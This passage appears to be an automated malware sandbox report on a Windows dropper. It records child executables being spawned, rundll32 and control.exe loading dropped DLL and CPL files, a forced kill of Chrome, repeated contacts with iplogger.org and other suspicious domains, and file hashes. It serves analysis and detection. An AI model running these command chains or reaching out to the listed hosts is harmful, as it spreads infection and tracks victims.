PID 1420 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\inst1.exe
PID 1420 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1420 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1420 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1420 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1420 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1420 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1420 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1968 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\mali.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1968 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\mali.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1968 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\mali.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1968 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\mali.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1420 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1420 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1420 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1420 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1420 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1420 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1420 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1420 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1420 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1420 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1420 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1420 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1420 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1420 wrote to memory of 1196 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1420 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
PID 1420 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
PID 1420 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
PID 1420 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
PID 1420 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime1.exe
PID 1420 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime1.exe
PID 1420 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime1.exe
PID 1420 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime1.exe
PID 1420 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime2.exe
PID 1420 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime2.exe
PID 1420 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime2.exe
PID 1420 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime2.exe
PID 1420 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime3.exe
PID 1420 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime3.exe
PID 1420 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime3.exe
PID 1420 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime3.exe
PID 1420 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime4.exe
PID 1420 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime4.exe
PID 1420 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime4.exe
PID 1420 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\anytime4.exe

Processes

C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe

"C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"

C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

"C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe"

C:\Users\Admin\AppData\Local\Temp\mali.exe

"C:\Users\Admin\AppData\Local\Temp\mali.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\inst1.exe

"C:\Users\Admin\AppData\Local\Temp\inst1.exe"

C:\Users\Admin\AppData\Local\Temp\mali.exe

"C:\Users\Admin\AppData\Local\Temp\mali.exe" -a

C:\Users\Admin\AppData\Local\Temp\askinstall63.exe

"C:\Users\Admin\AppData\Local\Temp\askinstall63.exe"

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe

"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"

C:\Users\Admin\AppData\Local\Temp\anytime1.exe

"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"

C:\Users\Admin\AppData\Local\Temp\anytime3.exe

"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"

C:\Users\Admin\AppData\Local\Temp\anytime4.exe

"C:\Users\Admin\AppData\Local\Temp\anytime4.exe"

C:\Users\Admin\AppData\Local\Temp\anytime2.exe

"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"

C:\Users\Admin\AppData\Local\Temp\anytime5.exe

"C:\Users\Admin\AppData\Local\Temp\anytime5.exe"

C:\Users\Admin\AppData\Local\Temp\anytime6.exe

"C:\Users\Admin\AppData\Local\Temp\anytime6.exe"

C:\Users\Admin\AppData\Local\Temp\anytime7.exe

"C:\Users\Admin\AppData\Local\Temp\anytime7.exe"

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Users\Admin\AppData\Local\Temp\anytime8.exe

"C:\Users\Admin\AppData\Local\Temp\anytime8.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\OGgy.cPl",

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe

"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe

"C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 v.xyzgamev.com udp
US 104.21.40.196:443 v.xyzgamev.com tcp
US 8.8.8.8:53 appwebstat.biz udp
US 8.8.8.8:53 apps.identrust.com udp
NL 104.110.191.182:80 apps.identrust.com tcp
US 8.8.8.8:53 www.listincode.com udp
US 103.224.182.208:443 www.listincode.com tcp
US 8.8.8.8:53 ads-memory.biz udp
US 216.239.32.178:80 www.google-analytics.com tcp
US 8.8.8.8:53 files.fastbestapp.com udp
US 172.67.192.181:443 files.fastbestapp.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 toa.mygametoa.com udp
US 8.8.8.8:53 toa.mygametoa.com udp
DE 148.251.234.83:443 iplogger.org tcp
KR 34.64.183.91:53 toa.mygametoa.com udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 216.239.32.178:80 www.google-analytics.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 pp.abcgameabc.com udp
US 104.21.34.132:443 pp.abcgameabc.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 www.microsoft.com udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 x2.c.lencr.org udp
NL 23.2.164.159:80 x2.c.lencr.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 e1.o.lencr.org udp
NL 104.110.191.185:80 e1.o.lencr.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 104.21.34.132:443 pp.abcgameabc.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 104.21.34.132:443 pp.abcgameabc.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp

Files

memory/1420-54-0x0000000000BF0000-0x0000000001068000-memory.dmp

memory/1420-55-0x0000000075591000-0x0000000075593000-memory.dmp

\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

MD5 0ccbbd11fdb0b98910d4205e46024827
SHA1 ffc930a70ee66f008e466991af30b722a7aadd62
SHA256 9b4c6a2b6b779596b19ef74180dcaa82598dd28d881b667565b59156a2e7f5dc
SHA512 122be222703e8c28f177e17a87dfcfcb017d2fdbd4c2e554b8a0b2c668b13be6c8e3ad00c2b0948052e289b06918822c2a08b441e0953713d318047272a37f53

\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

MD5 0ccbbd11fdb0b98910d4205e46024827
SHA1 ffc930a70ee66f008e466991af30b722a7aadd62
SHA256 9b4c6a2b6b779596b19ef74180dcaa82598dd28d881b667565b59156a2e7f5dc
SHA512 122be222703e8c28f177e17a87dfcfcb017d2fdbd4c2e554b8a0b2c668b13be6c8e3ad00c2b0948052e289b06918822c2a08b441e0953713d318047272a37f53

memory/1660-58-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

MD5 0ccbbd11fdb0b98910d4205e46024827
SHA1 ffc930a70ee66f008e466991af30b722a7aadd62
SHA256 9b4c6a2b6b779596b19ef74180dcaa82598dd28d881b667565b59156a2e7f5dc
SHA512 122be222703e8c28f177e17a87dfcfcb017d2fdbd4c2e554b8a0b2c668b13be6c8e3ad00c2b0948052e289b06918822c2a08b441e0953713d318047272a37f53

memory/1660-61-0x0000000000400000-0x00000000004D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe

MD5 0ccbbd11fdb0b98910d4205e46024827
SHA1 ffc930a70ee66f008e466991af30b722a7aadd62
SHA256 9b4c6a2b6b779596b19ef74180dcaa82598dd28d881b667565b59156a2e7f5dc
SHA512 122be222703e8c28f177e17a87dfcfcb017d2fdbd4c2e554b8a0b2c668b13be6c8e3ad00c2b0948052e289b06918822c2a08b441e0953713d318047272a37f53

memory/1660-62-0x0000000000400000-0x00000000004D1000-memory.dmp

\Users\Admin\AppData\Local\Temp\mali.exe

MD5 b7a7649929bfae3f163849925dd91166
SHA1 930c58877a1310c9f2feaa8cf2927098a68cd46e
SHA256 102711491df8626a33b1cfea7d7e840c391205f3e7f3408a428645b609643d50
SHA512 bd3263e65ab2bcc36c14a0546bcbc9b858b2c6fbdc4dfa2c5169451f6dade38f960e4fedf76bf925e6850f1760e5b2cb429b93ea68b2e40ea1dca40545eb776c

\Users\Admin\AppData\Local\Temp\mali.exe

MD5 b7a7649929bfae3f163849925dd91166
SHA1 930c58877a1310c9f2feaa8cf2927098a68cd46e
SHA256 102711491df8626a33b1cfea7d7e840c391205f3e7f3408a428645b609643d50
SHA512 bd3263e65ab2bcc36c14a0546bcbc9b858b2c6fbdc4dfa2c5169451f6dade38f960e4fedf76bf925e6850f1760e5b2cb429b93ea68b2e40ea1dca40545eb776c

memory/1968-66-0x0000000000000000-mapping.dmp

memory/1420-69-0x0000000005530000-0x0000000005601000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mali.exe

MD5 b7a7649929bfae3f163849925dd91166
SHA1 930c58877a1310c9f2feaa8cf2927098a68cd46e
SHA256 102711491df8626a33b1cfea7d7e840c391205f3e7f3408a428645b609643d50
SHA512 bd3263e65ab2bcc36c14a0546bcbc9b858b2c6fbdc4dfa2c5169451f6dade38f960e4fedf76bf925e6850f1760e5b2cb429b93ea68b2e40ea1dca40545eb776c

memory/1660-72-0x0000000000500000-0x0000000000518000-memory.dmp

memory/1732-74-0x0000000000000000-mapping.dmp

memory/1660-76-0x0000000000400000-0x00000000004D1000-memory.dmp

memory/1660-78-0x0000000000320000-0x0000000000359000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\inst1.exe

MD5 6454c263dc5ab402301309ca8f8692e0
SHA1 3c873bef2db3b844dc331fad7a2f20a1f0559759
SHA256 3f933885b67817db600687b4f59a67901f3d25d4e5fffd15ead10b356b43ad5e
SHA512 db9f4e73fcc73eb6d9adae1a2658d9c0f07da126a1d989cd4aa33f42ceb7c182bc97fb76f9d8ac3689c7c94027216b37326036f16a015ca1ba524dad59e4e8e9

\Users\Admin\AppData\Local\Temp\inst1.exe

MD5 6454c263dc5ab402301309ca8f8692e0
SHA1 3c873bef2db3b844dc331fad7a2f20a1f0559759
SHA256 3f933885b67817db600687b4f59a67901f3d25d4e5fffd15ead10b356b43ad5e
SHA512 db9f4e73fcc73eb6d9adae1a2658d9c0f07da126a1d989cd4aa33f42ceb7c182bc97fb76f9d8ac3689c7c94027216b37326036f16a015ca1ba524dad59e4e8e9

memory/1420-71-0x0000000005530000-0x0000000005601000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cb696bd52785bb4b873a5c3a7b681778
SHA1 4053f0ba7eafd38693f940a05ed4574f44a212ce
SHA256 d6b196e8c620269c3a0599ea5c7128269443e372c14f93c31b60503e4ce7db9d
SHA512 d54fd2f0d542dc92cbd5fcd4c792d9709d6fd1c595dce3ac0ad498759d218f73207b125c6ffb8c890b6ab03dbe724fefbc079cf6d306b004fed822778cafa2b3

memory/1732-83-0x00000000001C0000-0x00000000001D0000-memory.dmp

memory/1732-84-0x00000000001F0000-0x0000000000203000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mali.exe

MD5 b7a7649929bfae3f163849925dd91166
SHA1 930c58877a1310c9f2feaa8cf2927098a68cd46e
SHA256 102711491df8626a33b1cfea7d7e840c391205f3e7f3408a428645b609643d50
SHA512 bd3263e65ab2bcc36c14a0546bcbc9b858b2c6fbdc4dfa2c5169451f6dade38f960e4fedf76bf925e6850f1760e5b2cb429b93ea68b2e40ea1dca40545eb776c

memory/1692-86-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cb696bd52785bb4b873a5c3a7b681778
SHA1 4053f0ba7eafd38693f940a05ed4574f44a212ce
SHA256 d6b196e8c620269c3a0599ea5c7128269443e372c14f93c31b60503e4ce7db9d
